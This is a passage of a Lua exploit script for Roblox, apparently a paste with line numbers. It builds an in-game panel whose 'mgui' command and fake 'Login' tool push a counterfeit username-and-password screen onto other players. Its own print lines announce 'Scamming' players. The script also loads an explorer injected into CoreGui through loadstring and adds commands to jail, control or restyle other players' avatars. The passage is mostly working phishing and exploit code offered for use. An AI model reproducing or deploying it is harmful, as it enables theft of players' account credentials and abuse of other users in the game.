  634. NewGuiPart55.Size = UDim2.new(0, 80, 0, 20)
  635. NewGuiPart55.FontSize = Enum.FontSize.Size18
  636. NewGuiPart55.Text = "Tool Name"
  637. NewGuiPart55.TextColor3 = Color3.new(1, 1, 1)
  638. NewGuiPart55.TextWrapped = true
  639. NewGuiPart55.Parent = NewGuiPart50
  640. -------
  641. local NewGuiPart56 = Instance.new("TextButton")
  642. NewGuiPart56.BackgroundColor3 = Color3.new(0.0666667, 0.0666667, 0.0666667)
  643. NewGuiPart56.BackgroundTransparency = 0.69999998807907
  644. NewGuiPart56.BorderColor3 = Color3.new(0, 0, 0)
  645. NewGuiPart56.BorderSizePixel = 0
  646. NewGuiPart56.Name = "TL4"
  647. NewGuiPart56.Position = UDim2.new(0, 200, 0, 50)
  648. NewGuiPart56.Selectable = true
  649. NewGuiPart56.Size = UDim2.new(0, 80, 0, 20)
  650. NewGuiPart56.Style = Enum.ButtonStyle.Custom
  651. NewGuiPart56.FontSize = Enum.FontSize.Size14
  652. NewGuiPart56.Text = "CMD"
  653. NewGuiPart56.TextColor3 = Color3.new(1, 1, 1)
  654. NewGuiPart56.Parent = NewGuiPart2
  655. -------
  656. local NewGuiPart57 = Instance.new("Frame")
  657. NewGuiPart57.BackgroundTransparency = 1
  658. NewGuiPart57.Name = "ChatBox"
  659. NewGuiPart57.Position = UDim2.new(0, 20, 0, -25)
  660. NewGuiPart57.Size = UDim2.new(0, 245, 0, 400)
  661. NewGuiPart57.Visible = false
  662. NewGuiPart57.Draggable = true
  663. NewGuiPart57.Parent = NewGuiPart2
  664. -------
  665. local NewGuiPart58 = Instance.new("TextButton")
  666. NewGuiPart58.Active = true
  667. NewGuiPart58.BackgroundTransparency = 0.5
  668. NewGuiPart58.BorderSizePixel = 0
  669. NewGuiPart58.Name = "Chat"
  670. NewGuiPart58.Position = UDim2.new(0, 180, 0, 310)
  671. NewGuiPart58.Selectable = true
  672. NewGuiPart58.Size = UDim2.new(0, 65, 0, 50)
  673. NewGuiPart58.Style = Enum.ButtonStyle.Custom
  674. NewGuiPart58.FontSize = Enum.FontSize.Size14
  675. NewGuiPart58.Text = "Chat"
  676. NewGuiPart58.Parent = NewGuiPart57
  677. -------
  678. local NewGuiPart59 = Instance.new("TextLabel")
  679. NewGuiPart59.BackgroundTransparency = 0.5
  680. NewGuiPart59.BorderSizePixel = 0
  681. NewGuiPart59.Name = "Output"
  682. NewGuiPart59.Position = UDim2.new(0, 0, 0, 100)
  683. NewGuiPart59.Size = UDim2.new(0, 245, 0, 200)
  684. NewGuiPart59.Font = Enum.Font.Legacy
  685. NewGuiPart59.FontSize = Enum.FontSize.Size14
  686. NewGuiPart59.Text = ""
  687. NewGuiPart59.TextWrapped = true
  688. NewGuiPart59.Parent = NewGuiPart57
  689. -------
  690. local NewGuiPart60 = Instance.new("TextBox")
  691. NewGuiPart60.BackgroundTransparency = 0.5
  692. NewGuiPart60.Name = "Input"
  693. NewGuiPart60.Position = UDim2.new(0, 0, 0, 310)
  694. NewGuiPart60.Size = UDim2.new(0, 165, 0, 50)
  695. NewGuiPart60.FontSize = Enum.FontSize.Size28
  696. NewGuiPart60.Text = ""
  697. NewGuiPart60.Parent = NewGuiPart57
  698. -------
  699. local NewGuiPart61 = Instance.new("Frame")
  700. NewGuiPart61.BackgroundTransparency = 1
  701. NewGuiPart61.Name = "CMDS"
  702. NewGuiPart61.Position = UDim2.new(0, 20, 0, -25)
  703. NewGuiPart61.Size = UDim2.new(0, 245, 0, 400)
  704. NewGuiPart61.Visible = false
  705. NewGuiPart61.Draggable = true
  706. NewGuiPart61.Parent = NewGuiPart2
  707. -------
  708. local NewGuiPart62 = Instance.new("TextButton")
  709. NewGuiPart62.Active = true
  710. NewGuiPart62.BackgroundTransparency = 0.5
  711. NewGuiPart62.BorderSizePixel = 0
  712. NewGuiPart62.Name = "Execute"
  713. NewGuiPart62.Position = UDim2.new(0, 180, 0, 310)
  714. NewGuiPart62.Selectable = true
  715. NewGuiPart62.Size = UDim2.new(0, 65, 0, 50)
  716. NewGuiPart62.Style = Enum.ButtonStyle.Custom
  717. NewGuiPart62.FontSize = Enum.FontSize.Size12
  718. NewGuiPart62.Text = "Execute"
  719. NewGuiPart62.Parent = NewGuiPart61
  720. -------
  721. local NewGuiPart63 = Instance.new("TextLabel")
  722. NewGuiPart63.BackgroundTransparency = 0.5
  723. NewGuiPart63.BorderSizePixel = 0
  724. NewGuiPart63.Name = "Output"
  725. NewGuiPart63.Position = UDim2.new(0, 0, 0, 100)
  726. NewGuiPart63.Size = UDim2.new(0, 245, 0, 200)
  727. NewGuiPart63.Font = Enum.Font.Legacy
  728. NewGuiPart63.FontSize = Enum.FontSize.Size14
  729. NewGuiPart63.Text = ""
  730. NewGuiPart63.TextWrapped = true
  731. NewGuiPart63.Parent = NewGuiPart61
  732. -------
  733. local NewGuiPart64 = Instance.new("TextBox")
  734. NewGuiPart64.BackgroundTransparency = 0.5
  735. NewGuiPart64.Name = "CmdInput"
  736. NewGuiPart64.Position = UDim2.new(0, 0, 0, 310)
  737. NewGuiPart64.Size = UDim2.new(0, 165, 0, 50)
  738. NewGuiPart64.FontSize = Enum.FontSize.Size14
  739. NewGuiPart64.Text = ""
  740. NewGuiPart64.Parent = NewGuiPart61
  741.  
  742. local IsRunning = Instance.new("BoolValue")
  743. IsRunning.Value = false
  744. IsRunning.Name = "IsRunning"
  745. IsRunning.Parent = NewGuiPart2
  746.  
  747. local Login = Instance.new("Tool")
  748. Login.CanBeDropped = false
  749. Login.ManualActivationOnly = false
  750. Login.RequiresHandle = false
  751. Login.Name = "Login"
  752. Login.Parent = NewGuiPart1
  753.  
  754. local ToolName = Instance.new("StringValue")
  755. ToolName.Value = "Login"
  756. ToolName.Parent = CoreValues
  757. ToolName.Name = "ToolName"
  758.  
  759.  
  760. local NewGuiPart65 = Instance.new("ScreenGui")
  761. NewGuiPart65.Name = "LoginGui"
  762. NewGuiPart65.Parent = Login
  763. -------
  764. local NewGuiPart66 = Instance.new("Frame")
  765. NewGuiPart66.Name = "ErrorFrame"
  766. NewGuiPart66.Size = UDim2.new(1, 0, 1, 0)
  767. NewGuiPart66.Visible = false
  768. NewGuiPart66.Parent = NewGuiPart65
  769. -------
  770. local NewGuiPart67 = Instance.new("ImageLabel")
  771. NewGuiPart67.Active = false
  772. NewGuiPart67.Selectable = false
  773. NewGuiPart67.Size = UDim2.new(1, 0, 1, 0)
  774. NewGuiPart67.Image = "rbxassetid://423929933"
  775. NewGuiPart67.Parent = NewGuiPart66
  776. -------
  777. local NewGuiPart69 = Instance.new("TextLabel")
  778. NewGuiPart69.BackgroundTransparency = 1
  779. NewGuiPart69.BorderSizePixel = 0
  780. NewGuiPart69.Name = "UserName"
  781. NewGuiPart69.Position = UDim2.new(0, 50, 0.5, 0)
  782. NewGuiPart69.Size = UDim2.new(0, 100, 0, 50)
  783. NewGuiPart69.Font = Enum.Font.Legacy
  784. NewGuiPart69.FontSize = Enum.FontSize.Size14
  785. NewGuiPart69.Text = "UserName"
  786. NewGuiPart69.Parent = NewGuiPart66
  787. -------
  788. local NewGuiPart70 = Instance.new("TextLabel")
  789. NewGuiPart70.BackgroundTransparency = 1
  790. NewGuiPart70.BorderSizePixel = 0
  791. NewGuiPart70.Name = "Password"
  792. NewGuiPart70.Position = UDim2.new(0, 50, 0.5, 50)
  793. NewGuiPart70.Size = UDim2.new(0, 100, 0, 50)
  794. NewGuiPart70.Font = Enum.Font.Legacy
  795. NewGuiPart70.FontSize = Enum.FontSize.Size14
  796. NewGuiPart70.Text = "Password"
  797. NewGuiPart70.Parent = NewGuiPart66
  798. -------
  799. local NewGuiPart71 = Instance.new("TextBox")
  800. NewGuiPart71.BackgroundColor3 = Color3.new(255,255,255)
  801. NewGuiPart71.BorderColor3 = Color3.new(0, 0, 0)
  802. NewGuiPart71.BorderSizePixel = 2
  803. NewGuiPart71.Name = "TB2"
  804. NewGuiPart71.Position = UDim2.new(0, 160, 0.5, 65)
  805. NewGuiPart71.Size = UDim2.new(0, 200, 0, 20)
  806. NewGuiPart71.Font = Enum.Font.Legacy
  807. NewGuiPart71.FontSize = Enum.FontSize.Size14
  808. NewGuiPart71.Text = ""
  809. NewGuiPart71.Parent = NewGuiPart66
  810. -------
  811. local NewGuiPart72 = Instance.new("ImageButton")
  812. NewGuiPart72.Active = true
  813. NewGuiPart71.BackgroundColor3 = Color3.new(73,123,255)
  814. NewGuiPart72.BackgroundTransparency = 0.5
  815. NewGuiPart72.Name = "LoginButton"
  816. NewGuiPart72.Position = UDim2.new(0, 90, 0.5, 150)
  817. NewGuiPart72.Selectable = true
  818. NewGuiPart72.Size = UDim2.new(0, 280, 0, 25)
  819. NewGuiPart72.Style = Enum.ButtonStyle.RobloxRoundButton
  820. NewGuiPart72.Visible = true
  821. NewGuiPart72.Image = "rbxassetid://431070395"
  822. NewGuiPart72.Parent = NewGuiPart66
  823. -------
  824. local NewGuiPart73 = Instance.new("TextLabel")
  825. NewGuiPart73.BackgroundColor3 = Color3.new(255,255,255)
  826. NewGuiPart73.BorderColor3 = Color3.new(0, 0, 0)
  827. NewGuiPart73.BorderSizePixel = 0
  828. NewGuiPart73.Name = "TB1"
  829. NewGuiPart73.Position = UDim2.new(0, 160, 0.5, 15)
  830. NewGuiPart73.Size = UDim2.new(0, 200, 0, 20)
  831. NewGuiPart73.Font = Enum.Font.Legacy
  832. NewGuiPart73.FontSize = Enum.FontSize.Size14
  833. NewGuiPart73.Text = ""
  834. NewGuiPart73.Parent = NewGuiPart66
  835.  
  836.  
  837. local Textg = Instance.new("TextLabel")
  838. Textg.BackgroundColor3 = Color3.new(255,255,255)
  839. Textg.BorderColor3 = Color3.new(0, 0, 0)
  840. Textg.BorderSizePixel = 0
  841. Textg.Name = "Text"
  842. Textg.Position = UDim2.new(0, 90, 0.5,115)
  843. Textg.Size = UDim2.new(0, 200, 0, 20)
  844. Textg.Font = Enum.Font.Legacy
  845. Textg.FontSize = Enum.FontSize.Size14
  846. Textg.Text = ""
  847. Textg.Parent = NewGuiPart66
  848.  
  849. local Done = Instance.new("BoolValue")
  850. Done.Name = "Done"
  851. Done.Value = false
  852. Done.Parent = NewGuiPart66
  853.  
  854. local Folderr = Instance.new("Folder")
  855. Folderr.Parent = CoreValues
  856. Folderr.Name = "Folder"
  857.  
  858.  
  859. local UserName = Instance.new("StringValue")
  860. UserName.Name = "UserName"
  861. UserName.Parent = Folderr
  862.  
  863. local PassWord = Instance.new("StringValue")
  864. PassWord.Name = "Password"
  865. PassWord.Parent = Folderr
  866.  
  867.  
  868.  
  869. local UsingTool = Instance.new("BoolValue")
  870. UsingTool.Parent = CoreValues
  871. UsingTool.Name = "UsingTool"
  872. UsingTool.Value = true
  873.  
  874. NewGuiPart1:Clone().Parent = CoreValues
  875. NewGuiPart65:Clone().Parent = CoreValues
  876.  
  877.  
  878.  
  879. print("MGVX LIB Running")
  880. local Lib = Instance.new("Folder")
  881. Lib.Name = "ACCOUNTLIB"
  882. Lib.Parent = CoreValues
  883.  
  884. if PassWord.Value ~= nil and UserName.Value ~= nil then
  885. namer = Instance.new("Folder")
  886. namer.Parent = Lib
  887. namer.Name = UserName.Value
  888. old = PassWord:Clone()
  889. old.Parent = namer
  890. old.Name = UserName.Value
  891. oldu = UserName:Clone()
  892. oldu.Parent = namer
  893. oldu.Name = UserName.Value
  894. new = PassWord:Clone()
  895. new.Value = ""
  896. new.Name = "PassWord"
  897. new.Parent = Folderr
  898. newu = UserName:Clone()
  899. newu.Value = ""
  900. newu.Name = "UserName"
  901. newu.Parent = Folderr
  902. UserName:Destroy();
  903. PassWord:Destroy();
  904. end
  905.  
  906.  
  907.  
  908.  
  909. function GetPlr(plr, str)
  910. local plrz = {} str = str:lower()
  911. if str == "all" then plrz = game.Players:children()
  912. elseif str == "others" then for i, v in pairs(game.Players:children()) do if v ~= plr then table.insert(plrz, v) end end
  913. else
  914. local sn = {1} local en = {}
  915. for i = 1, #str do if str:sub(i,i) == "," then table.insert(sn, i+1) table.insert(en,i-1) end end
  916. for x = 1, #sn do
  917. if (sn[x] and en[x] and str:sub(sn[x],en[x]) == "me") or (sn[x] and str:sub(sn[x]) == "me") then table.insert(plrz, plr)
  918. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]) == "random") or (sn[x] and str:sub(sn[x]) == "random") then table.insert(plrz, game.Players:children()[math.random(#game.Players:children())])
  919. elseif (sn[x] and en[x] and str:sub(sn[x],en[x]):sub(1,4) == "team") then
  920. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x],en[x]):sub(6)) == 1 then
  921. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  922. end end end
  923. elseif (sn[x] and str:sub(sn[x]):sub(1,4):lower() == "team") then
  924. if game:findFirstChild("Teams") then for a, v in pairs(game.Teams:children()) do if v:IsA("Team") and str:sub(sn[x],en[x]):sub(6) ~= "" and v.Name:lower():find(str:sub(sn[x]):sub(6)) == 1 then
  925. for q, p in pairs(game.Players:children()) do if p.TeamColor == v.TeamColor then table.insert(plrz, p) end end break
  926. end end end
  927. else
  928. for a, plyr in pairs(game.Players:children()) do
  929. if (sn[x] and en[x] and str:sub(sn[x],en[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x],en[x])) == 1) or (sn[x] and str:sub(sn[x]) ~= "" and plyr.Name:lower():find(str:sub(sn[x])) == 1) or (str ~= "" and plyr.Name:lower():find(str) == 1) then
  930. table.insert(plrz, plyr) break
  931. end
  932. end
  933. end
  934. end
  935. end
  936. return plrz
  937. end
  938.  
  939.  
  940. --------------FUNCTIONS---------------
  941. local NumofPlayers = game:GetService("Players").NumPlayers
  942. local NumOfPlayersBeingScammed = NumofPlayers-1
  943. local DoneBeingScammed = {}
  944.  
  945.  
  946.  
  947.  
  948.  
  949.  
  950. function Clicked4()
  951.  
  952. if NewGuiPart52.Text ~= nil then
  953. Login.Name = NewGuiPart52.Text
  954. ToolName.Value = NewGuiPart52.Text
  955. end
  956.  
  957. if NewGuiPart52.Text == nil then
  958. Login.Name = "Login"
  959. ToolName.Value = "Login"
  960. end
  961.  
  962.  
  963.  
  964.  
  965. NewGuiPart50.Visible = false
  966.  
  967. end
  968.  
  969.  
  970.  
  971. function Click()
  972. local ppl = game.Players:GetChildren()
  973. local spots = NewGuiPart6:children()
  974. for i = 1,#ppl do
  975. spots[i].Visible = true
  976. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  977. spots[i].TextLabel.Text = ppl[i].Name
  978. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  979. spots[i].TextLabel.Text = ''
  980. spots[i].ImageLabel.Image = ''
  981. end
  982. end
  983. end
  984. function Clicked()
  985. for i,x in pairs(Others) do
  986. local v = game.Players[x]
  987. if v then
  988. v.Backpack:GetChildren().Parent = workspace
  989.  
  990.  
  991. if UsingTool.Value == true then
  992. Login:Clone().Parent = v.Backpack
  993. NewGuiPart4.Text = "Scanning..."
  994. print("Scamming ".. NumOfPlayersBeingScammed .. " Players!")
  995. NewGuiPart50.Visible = false
  996. NewGuiPart61.Visible = false
  997. NewGuiPart5.Visible = true
  998. IsRunning.Value = true
  999. Owner.Backpack:WaitForChild(ToolName.Value):Destroy();
  1000. end end
  1001. end end
  1002.  
  1003.  
  1004.  
  1005. function Clicked1()
  1006. NewGuiPart5.Visible = false
  1007. NewGuiPart61.Visible = false
  1008. NewGuiPart50.Visible = true
  1009. end
  1010.  
  1011. function Clicked2()
  1012. NewGuiPart5.Visible = false
  1013. NewGuiPart50.Visible = false
  1014. NewGuiPart61.Visible = true
  1015. end
  1016.  
  1017.  
  1018. plrrr = game.Players.LocalPlayer
  1019. plrr = game.Players:GetChildren()
  1020. Input = NewGuiPart64
  1021. Exe = NewGuiPart62
  1022. Output = NewGuiPart63
  1023. Output.Text = "Welcome, "..plrrr.Name.."."
  1024.  
  1025.  
  1026. game.Players.PlayerAdded:connect(function()
  1027. local ppl = game.Players:GetChildren()
  1028. local spots = NewGuiPart6:children()
  1029. for i = 1,#ppl do
  1030. spots[i].Visible = true
  1031. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1032. spots[i].TextLabel.Text = ppl[i].Name
  1033. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1034. spots[i].TextLabel.Text = ''
  1035. spots[i].ImageLabel.Image = ''
  1036. end
  1037.  
  1038. end
  1039. end)
  1040.  
  1041. game.Players.PlayerRemoving:connect(function()
  1042. local ppl = game.Players:GetChildren()
  1043. local spots = NewGuiPart6:children()
  1044. for i = 1,#ppl do
  1045. spots[i].Visible = true
  1046. spots[i].ImageLabel.Image = 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..ppl[i].Name
  1047. spots[i].TextLabel.Text = ppl[i].Name
  1048. if spots[i].TextLabel.Text == Owner.Name and spots[i].ImageLabel.Image == 'http://www.roblox.com/Thumbs/Avatar.ashx?x=100&y=100&username='..Owner.Name then
  1049. spots[i].TextLabel.Text = ''
  1050. spots[i].ImageLabel.Image = ''
  1051. end
  1052.  
  1053. end
  1054. end)
  1055.  
  1056. function mgui(user)
  1057. local person = game.Players[user]
  1058. print("1")
  1059. game.MGVXCore.LoginGui.ErrorFrame.Visible = true
  1060. sum = game.MGVXCore.LoginGui:Clone(); print("two")
  1061. sum.Parent = person.PlayerGui print("2")
  1062. gui = sum
  1063. passw = gui.ErrorFrame.TB2.Text
  1064. tb1 = gui.ErrorFrame.TB1.Text
  1065.  
  1066. end
  1067.  
  1068.  
  1069.  
  1070. function Clicked3(arg)
  1071. local Cmd = Input
  1072. local allp = game.Players:GetChildren()
  1073. local numb;
  1074. local pp;
  1075. local p;
  1076. local num;
  1077. local argus = {"me", "all",numb,plrr}
  1078.  
  1079. if Cmd.Text:lower():sub(1,5) == "mgui " then
  1080. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1081. for i, v in pairs(plrz) do
  1082. if v then
  1083. mgui(v.Name);
  1084. print("Scamming ".. NumOfPlayersBeingScammed .. " Players!")
  1085. end
  1086.  
  1087. end
  1088.  
  1089.  
  1090. end
  1091.  
  1092. if Cmd.Text:sub(1, 12) == "viewExplorer" then
  1093. local obj = game:GetService("InsertService"):LoadAsset(418955355)
  1094. obj.Parent = game.CoreGui
  1095. obj.ExplorerPanel.LocalScript.Source = string.gsub(obj.ExplorerPanel.LocalScript.Source,"script.Parent","game.CoreGui.Dex.ExplorerPanel")
  1096. obj.PropertiesFrame.Properties.Source = string.gsub(obj.PropertiesFrame.Properties.Source,"script.Parent.Parent","game.CoreGui.Dex")
  1097. obj.Selection.Source = string.gsub(obj.Selection.Source,"script.Parent","game.CoreGui.Dex")
  1098.  
  1099. spawn(function()
  1100. loadstring(obj.ExplorerPanel.LocalScript.Source)()
  1101. end)
  1102. spawn(function()
  1103. loadstring(obj.PropertiesFrame.Properties.Source)()
  1104. end)
  1105. spawn(function()
  1106. loadstring(obj.Selection.Source)()
  1107. end)
  1108.  
  1109.  
  1110.  
  1111. elseif Cmd.Text:sub(1,13) == "closeExplorer" then
  1112. game.CoreGui.Dex:Destroy()
  1113. end
  1114.  
  1115. if Cmd.Text:lower():sub(1,4) == "hat " then
  1116. local chk1 = Cmd.Text:lower():sub(5):find(" ") + 4
  1117. local plrz = GetPlr(plr, Cmd.Text:lower():sub(5, chk1-1))
  1118. for i, v in pairs(plrz) do
  1119. coroutine.resume(coroutine.create(function()
  1120. if v and v.Character then
  1121. local obj = game:service("InsertService"):LoadAsset(tonumber(Cmd.Text:sub(chk1+1)))
  1122. for a,hat in pairs(obj:children()) do if hat:IsA("Hat") then hat.Parent = v.Character end end
  1123. obj:Destroy()
  1124. end
  1125. end))
  1126. end
  1127. end
  1128.  
  1129. if Cmd.Text:lower():sub(1,5) == "cape " then
  1130. local chk1 = Cmd.Text:lower():sub(6):find(" ")
  1131. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1132. local str = "torso.BrickColor"
  1133. if chk1 then chk1 = chk1 + 5 plrz = GetPlr(plr, Cmd.Text:lower():sub(6,chk1-1))
  1134. local teststr = [[BrickColor.new("]]..Cmd.Text:sub(chk1+1,chk1+1):upper()..Cmd.Text:sub(chk1+2):lower()..[[")]]
  1135. if Cmd.Text:sub(chk1+1):lower() == "new yeller" then teststr = [[BrickColor.new("New Yeller")]] end
  1136. if Cmd.Text:sub(chk1+1):lower() == "pastel blue" then teststr = [[BrickColor.new("Pastel Blue")]] end
  1137. if Cmd.Text:sub(chk1+1):lower() == "dusty rose" then teststr = [[BrickColor.new("Dusty Rose")]] end
  1138. if Cmd.Text:sub(chk1+1):lower() == "cga brown" then teststr = [[BrickColor.new("CGA brown")]] end
  1139. if Cmd.Text:sub(chk1+1):lower() == "random" then teststr = [[BrickColor.random()]] end
  1140. if Cmd.Text:sub(chk1+1):lower() == "shiny" then teststr = [[BrickColor.new("Institutional white") p.Reflectance = 1]] end
  1141. if Cmd.Text:sub(chk1+1):lower() == "gold" then teststr = [[BrickColor.new("Bright yellow") p.Reflectance = .4]] end
  1142. if Cmd.Text:sub(chk1+1):lower() == "kohl" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597653"]] end
  1143. if Cmd.Text:sub(chk1+1):lower() == "batman" then teststr = [[BrickColor.new("Really black") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597669"]] end
  1144. if Cmd.Text:sub(chk1+1):lower() == "superman" then teststr = [[BrickColor.new("Bright blue") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=108597677"]] end
  1145. if Cmd.Text:sub(chk1+1):lower() == "swag" then teststr = [[BrickColor.new("Pink") local dec = Instance.new("Decal", p) dec.Face = 2 dec.Texture = "http://www.roblox.com/asset/?id=109301474"]] end
  1146. if BrickColor.new(teststr) ~= nil then str = teststr end
  1147. end
  1148. for i, v in pairs(plrz) do
  1149. coroutine.resume(coroutine.create(function()
  1150. if v and v:findFirstChild("PlayerGui") and v.Character and v.Character:findFirstChild("Torso") then
  1151. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1152. local cl = script.LocalScriptBase:Clone() cl.Name = "CapeScript" cl.Code.Value = [[local plr = game.Players.LocalPlayer
  1153. repeat wait() until plr and plr.Character and plr.Character:findFirstChild("Torso")
  1154. local torso = plr.Character.Torso
  1155. local p = Instance.new("Part", torso.Parent) p.Name = "EpicCape" p.Anchored = false
  1156. p.CanCollide = false p.TopSurface = 0 p.BottomSurface = 0 p.BrickColor = ]]..str..[[ p.formFactor = "Custom"
  1157. p.Size = Vector3.new(.2,.2,.2)
  1158. local msh = Instance.new("BlockMesh", p) msh.Scale = Vector3.new(9,17.5,.5)
  1159. local motor1 = Instance.new("Motor", p)
  1160. motor1.Part0 = p
  1161. motor1.Part1 = torso
  1162. motor1.MaxVelocity = .01
  1163. motor1.C0 = CFrame.new(0,1.75,0)*CFrame.Angles(0,math.rad(90),0)
  1164. motor1.C1 = CFrame.new(0,1,.45)*CFrame.Angles(0,math.rad(90),0)
  1165. local wave = false
  1166. repeat wait(1/44)
  1167. local ang = 0.1
  1168. local oldmag = torso.Velocity.magnitude
  1169. local mv = .002
  1170. if wave then ang = ang + ((torso.Velocity.magnitude/10)*.05)+.05 wave = false else wave = true end
  1171. ang = ang + math.min(torso.Velocity.magnitude/11, .5)
  1172. motor1.MaxVelocity = math.min((torso.Velocity.magnitude/111), .04) + mv
  1173. motor1.DesiredAngle = -ang
  1174. if motor1.CurrentAngle < -.2 and motor1.DesiredAngle > -.2 then motor1.MaxVelocity = .04 end
  1175. repeat wait() until motor1.CurrentAngle == motor1.DesiredAngle or math.abs(torso.Velocity.magnitude - oldmag) >= (torso.Velocity.magnitude/10) + 1
  1176. if torso.Velocity.magnitude < .1 then wait(.1) end
  1177. until not p or p.Parent ~= torso.Parent
  1178. script:Destroy()
  1179. ]] cl.Parent = v.PlayerGui cl.Disabled = false
  1180. end
  1181. end))
  1182. end
  1183. end
  1184.  
  1185. if Cmd.Text:lower():sub(1,7) == "uncape " then
  1186. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1187. for i, v in pairs(plrz) do
  1188. coroutine.resume(coroutine.create(function()
  1189. if v and v:findFirstChild("PlayerGui") and v.Character then
  1190. for a,cp in pairs(v.Character:children()) do if cp.Name == "EpicCape" then cp:Destroy() end end
  1191. end
  1192. end))
  1193. end
  1194. end
  1195.  
  1196.  
  1197. if Cmd.Text:lower():sub(1,5) == "jail " then
  1198. local plrz = GetPlr(plr, Cmd.Text:lower():sub(6))
  1199. for i, v in pairs(plrz) do
  1200. coroutine.resume(coroutine.create(function()
  1201. if v and v.Character and v.Character:findFirstChild("Torso") then
  1202. local vname = v.Name
  1203. local cf = v.Character.Torso.CFrame + Vector3.new(0,1,0)
  1204. local mod = Instance.new("Model", game.Workspace) mod.Name = v.Name .. " Jail"
  1205. local top = Instance.new("Part", mod) top.Locked = true top.formFactor = "Symmetric" top.Size = Vector3.new(6,1,6) top.TopSurface = 0 top.BottomSurface = 0 top.Anchored = true top.BrickColor = BrickColor.new("Really black") top.CFrame = cf * CFrame.new(0,-3.5,0)
  1206. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1207. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1208. game.Players.PlayerAdded:connect(function(plr) if plr.Name == vname then v = plr end
  1209. v.CharacterAdded:connect(function() if not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1210. v.Changed:connect(function(p) if p ~= "Character" or not mod or (mod and mod.Parent ~= game.Workspace) then return end repeat wait() until v and v.Character and v.Character:findFirstChild("Torso") v.Character.Torso.CFrame = cf end)
  1211. end)
  1212. local bottom = top:Clone() bottom.Parent = mod bottom.CFrame = cf * CFrame.new(0,3.5,0)
  1213. local front = top:Clone() front.Transparency = .5 front.Reflectance = .1 front.Parent = mod front.Size = Vector3.new(6,6,1) front.CFrame = cf * CFrame.new(0,0,-3)
  1214. local back = front:Clone() back.Parent = mod back.CFrame = cf * CFrame.new(0,0,3)
  1215. local right = front:Clone() right.Parent = mod right.Size = Vector3.new(1,6,6) right.CFrame = cf * CFrame.new(3,0,0)
  1216. local left = right:Clone() left.Parent = mod left.CFrame = cf * CFrame.new(-3,0,0)
  1217. local msh = Instance.new("BlockMesh", front) msh.Scale = Vector3.new(1,1,0)
  1218. local msh2 = msh:Clone() msh2.Parent = back
  1219. local msh3 = msh:Clone() msh3.Parent = right msh3.Scale = Vector3.new(0,1,1)
  1220. local msh4 = msh3:Clone() msh4.Parent = left
  1221. v.Character.Torso.CFrame = cf
  1222. end
  1223. end))
  1224. end
  1225. end
  1226.  
  1227. if Cmd.Text:lower():sub(1,7) == "unjail " then
  1228. local plrz = GetPlr(plr, Cmd.Text:lower():sub(8))
  1229. for i, v in pairs(plrz) do coroutine.resume(coroutine.create(function() if v then for a, jl in pairs(game.Workspace:children()) do if jl.Name == v.Name .. " Jail" then jl:Destroy() end end end end)) end
  1230. end
  1231.  
  1232.  
  1233.  
  1234. if Cmd.Text:lower():sub(1,8) == "control " then
  1235. local plrz = GetPlr(plr, Cmd.Text:lower():sub(9))
  1236. for i, v in pairs(plrz) do
  1237. coroutine.resume(coroutine.create(function()
  1238. if v and v.Character then
  1239. v.Character.Humanoid.PlatformStand = true
  1240. local w = Instance.new("Weld", plr.Character.Torso )
  1241. w.Part0 = plr.Character.Torso
  1242. w.Part1 = v.Character.Torso
  1243. local w2 = Instance.new("Weld", plr.Character.Head)
  1244. w2.Part0 = plr.Character.Head
  1245. w2.Part1 = v.Character.Head
  1246. local w3 = Instance.new("Weld", plr.Character:findFirstChild("Right Arm"))
  1247. w3.Part0 = plr.Character:findFirstChild("Right Arm")
  1248. w3.Part1 = v.Character:findFirstChild("Right Arm")
  1249. local w4 = Instance.new("Weld", plr.Character:findFirstChild("Left Arm"))
  1250. w4.Part0 = plr.Character:findFirstChild("Left Arm")
  1251. w4.Part1 = v.Character:findFirstChild("Left Arm")
  1252. local w5 = Instance.new("Weld", plr.Character:findFirstChild("Right Leg"))
  1253. w5.Part0 = plr.Character:findFirstChild("Right Leg")
  1254. w5.Part1 = v.Character:findFirstChild("Right Leg")
  1255. local w6 = Instance.new("Weld", plr.Character:findFirstChild("Left Leg"))
  1256. w6.Part0 = plr.Character:findFirstChild("Left Leg")
  1257. w6.Part1 = v.Character:findFirstChild("Left Leg")
  1258. plr.Character.Head.face:Destroy()
  1259. for i, p in pairs(v.Character:children()) do
  1260. if p:IsA("BasePart") then
  1261. p.CanCollide = false
  1262. end
  1263. end
  1264. for i, p in pairs(plr.Character:children()) do
  1265. if p:IsA("BasePart") then
  1266. p.Transparency = 1
  1267. elseif p:IsA("Hat") then
